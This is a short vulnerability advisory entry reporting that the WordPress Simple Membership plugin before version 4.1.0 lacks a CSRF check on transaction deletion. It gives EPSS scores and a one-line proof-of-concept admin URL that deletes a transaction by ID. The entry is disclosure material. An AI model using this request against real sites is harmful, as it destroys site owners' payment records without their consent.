Lucene search

K
wpexploitMuhamad hidayatWPEX-ID:C5765816-4439-4C14-A847-044248ADA0EF
HistoryFeb 25, 2022 - 12:00 a.m.

Simple Membership < 4.1.0 - Arbitrary Transaction Deletion via CSRF

2022-02-2500:00:00
muhamad hidayat
98
simple membership
arbitrary transaction
csrf
deletion

EPSS

0.001

Percentile

26.3%

The plugin does not have CSRF check in place when deleting Transactions, which could allow attackers to make a logged in admin delete arbitrary transactions via a CSRF attack

https://example.com/wp-admin/admin.php?page=simple_wp_membership_payments&action=delete_txn&id=1 will delete the transaction with ID 1

EPSS

0.001

Percentile

26.3%

Related for WPEX-ID:C5765816-4439-4C14-A847-044248ADA0EF